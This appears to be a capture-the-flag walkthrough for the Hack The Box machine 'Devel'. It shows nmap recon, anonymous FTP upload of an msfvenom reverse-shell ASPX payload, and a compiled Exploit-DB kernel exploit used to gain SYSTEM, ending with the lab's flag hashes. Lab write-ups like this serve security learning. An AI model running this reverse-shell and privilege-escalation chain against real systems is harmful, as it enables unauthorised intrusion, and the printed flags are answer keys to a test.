🔗 Devel
🎯 Target IP: 10.10.10.5
Create a directory for machine on the Desktop and a directory containing the scans with nmap.
su
echo "10.10.10.5 devel.htb" >> /etc/hosts
mkdir htb/devel.htb
cd htb/devel.htb
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
ping -c 3 devel.htb
PING devel.htb (10.10.10.5) 56(84) bytes of data.
64 bytes from devel.htb (10.10.10.5): icmp_seq=1 ttl=127 time=57.1 ms
64 bytes from devel.htb (10.10.10.5): icmp_seq=2 ttl=127 time=53.6 ms
64 bytes from devel.htb (10.10.10.5): icmp_seq=3 ttl=127 time=56.2 ms
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~128 secs. this indicates that the target is a Windows system, while *nix systems usually have a TTL of 64 secs.
nmap --open -p0- -n -Pn -vvv --min-rate 5000 devel.htb -oG port_scan
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 15:32 EDT
Initiating SYN Stealth Scan at 15:32
Scanning devel.htb (10.10.10.5) [65536 ports]
Discovered open port 80/tcp on 10.10.10.5
Discovered open port 21/tcp on 10.10.10.5
Completed SYN Stealth Scan at 15:32, 26.41s elapsed (65536 total ports)
Nmap scan report for devel.htb (10.10.10.5)
Host is up, received user-set (0.057s latency).
Scanned at 2023-07-24 15:32:23 EDT for 26s
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 127
80/tcp open http syn-ack ttl 127
command | result |
---|---|
sudo | run as root |
sC | run default scripts |
sV | enumerate versions |
A | aggressive mode |
T4 | run a bit faster |
oN | output to file with nmap formatting |
It looks like there are 2 open ports on the machine: 21, 80.
Now, we need to search which services are running on open ports, in details on port 21:
nmap -p21,80 -n -Pn -vvv -sCV --min-rate 5000 devel.htb -oN open_ports
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 07-24-23 11:15AM 241062 40564.exe
| 03-18-17 02:06AM <DIR> aspnet_client
| 07-24-23 01:26AM 1442 cmdasp.aspx
| 07-24-23 12:36AM 2914 devel.aspx
| 07-24-23 01:04AM 2886 devel1.aspx
| 07-24-23 04:44PM 2917 devel2.aspx
| 07-24-23 02:11AM 2749 develshell.aspx
| 07-24-23 11:09AM 15966 fox.aspx
| 07-24-23 09:26AM 2906 hacked.aspx
| 03-17-17 05:37PM 689 iisstart.htm
| 07-24-23 07:16PM 0 killbill.aspx
| 07-24-23 07:21PM 2912 killbill1.aspx
| 07-24-23 12:17AM 2783 pwned.aspx
| 07-24-23 03:00PM 2923 rev.aspx
| 07-24-23 09:21PM 15969 shell.aspx
| 07-24-23 03:34PM 73802 virus.exe
| 07-24-23 12:34AM 112815 virus2.exe
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
{% hint style="info" %} Microsoft ftpd {% endhint %}
ftp devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel.htb:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> help
Commands may be abbreviated. Commands are:
! cr ftp macdef msend prompt restart sunique
$ debug gate mdelete newer proxy rhelp system
account delete get mdir nlist put rmdir tenex
append dir glob mget nmap pwd rstatus throttle
ascii disconnect hash mkdir ntrans quit runique trace
bell edit help mls open quote send type
binary epsv idle mlsd page rate sendport umask
bye epsv4 image mlst passive rcvbuf set unset
case epsv6 lcd mode pdir recv site usage
cd exit less modtime pls reget size user
cdup features lpage more pmlsd remopts sndbuf verbose
chmod fget lpwd mput preserve rename status xferbuf
close form ls mreget progress reset struct ?
We can use put command to upload a single file.
{% hint style="info" %} put {% endhint %}
We can try to put a file using ftp, in this case we use nmap result file (port_scan):
ftp> put port_scan
ftp> put port_scan
local: port_scan remote: port_scan
229 Entering Extended Passive Mode (|||49219|)
150 Opening ASCII mode data connection.
100% |***************************************************************************************| 464 8.84 MiB/s --:-- ETA
226 Transfer complete.
464 bytes sent in 00:00 (7.98 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49220|)
125 Data connection already open; Transfer starting.
07-24-23 11:15AM 241062 40564.exe
03-18-17 02:06AM <DIR> aspnet_client
07-24-23 01:26AM 1442 cmdasp.aspx
07-24-23 12:36AM 2914 devel.aspx
07-24-23 01:04AM 2886 devel1.aspx
07-24-23 04:44PM 2917 devel2.aspx
07-24-23 02:11AM 2749 develshell.aspx
07-24-23 11:09AM 15966 fox.aspx
07-24-23 09:26AM 2906 hacked.aspx
03-17-17 05:37PM 689 iisstart.htm
07-24-23 07:16PM 0 killbill.aspx
07-24-23 07:21PM 2912 killbill1.aspx
07-24-23 10:57PM 464 port_scan
07-24-23 12:17AM 2783 pwned.aspx
07-24-23 03:00PM 2923 rev.aspx
07-24-23 09:21PM 15969 shell.aspx
07-24-23 03:34PM 73802 virus.exe
07-24-23 12:34AM 112815 virus2.exe
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
{% hint style="info" %} yes {% endhint %}
ftp> ls
229 Entering Extended Passive Mode (|||49220|)
125 Data connection already open; Transfer starting.
07-24-23 11:15AM 241062 40564.exe
03-18-17 02:06AM <DIR> aspnet_client
07-24-23 01:26AM 1442 cmdasp.aspx
07-24-23 12:36AM 2914 devel.aspx
07-24-23 01:04AM 2886 devel1.aspx
07-24-23 04:44PM 2917 devel2.aspx
07-24-23 02:11AM 2749 develshell.aspx
07-24-23 11:09AM 15966 fox.aspx
07-24-23 09:26AM 2906 hacked.aspx
03-17-17 05:37PM 689 iisstart.htm
07-24-23 07:16PM 0 killbill.aspx
07-24-23 07:21PM 2912 killbill1.aspx
07-24-23 10:57PM 464 port_scan
07-24-23 12:17AM 2783 pwned.aspx
07-24-23 03:00PM 2923 rev.aspx
07-24-23 09:21PM 15969 shell.aspx
07-24-23 03:34PM 73802 virus.exe
07-24-23 12:34AM 112815 virus2.exe
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
{% hint style="info" %} aspx {% endhint %}
2.5 - Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?
We launch msfconsole:
msfconsole
and we search a post/multi/recon exploit:
search post/multi/recon
{% hint style="info" %} local_exploit_suggester {% endhint %}
Now, we can use msfvenom to generate an exploit to upload using ftp
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=444 -f aspx > exploit.aspx
Payload size: 327 bytes
Final size of aspx file: 2748 bytes
LHOST is local ip, while, LPORT is the port that we'll use to connect by netcat.
ftp> put script.aspx
local: script.aspx remote: script.aspx
229 Entering Extended Passive Mode (|||49224|)
125 Data connection already open; Transfer starting.
100% |**************************************************************| 2748 1.12 MiB/s --:-- ETA
226 Transfer complete.
2748 bytes sent in 00:00 (45.20 KiB/s)
Now we can launch netcat on port 444 and run script:
c:\Windows>whoami
whoami
iis apppool\web
We're iis apppool\web user, the flag maybe is on the babiis user's desktop
We've not access to babibs' directory, we can try to find "user.txt" flag using while command in C:\ root.
where /r C:\ user.txt
Nothing to do! Now, we need to privilege escalation and access on bibis' dir.
We launch systeminfo command to know info about OS:
systeminfo
OS Version: 6.1.7600 N/A Build 7600
Searching on google we found this exploit for OS vs.
https://www.exploit-db.com/exploits/40564
We download this script: "40564.c" and we compile it using mingw32
i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32
Now we can re-open ftp in binary mode and put it (exploit.exe)
We can find exploit.exe file using where command and run it to escalate privilege!
where /r C:\ exploit.exe
c:\inetpub\wwwroot>exploit.exe
whoami
nt authority\system
Starting to root folder (C:\) we can find quickly flags, using where command in recusive mode (/r):
where /r C:\ user.txt
C:\Users\babis\Desktop\user.txt
and read user.txt flag using type command (equivalent to cat on *nix):
type C:\Users\babis\Desktop\user.txt
🚩 Flag 1 (user.txt)
5d3fc209e1fae6d5df926fe7dc8a16bd
After that, we do the same thing for root.txt flag
where /r C:\ root.txt
C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
🚩 Flag 2 (root.txt)
cb43e154f9c2ca60b68c8150e5162f32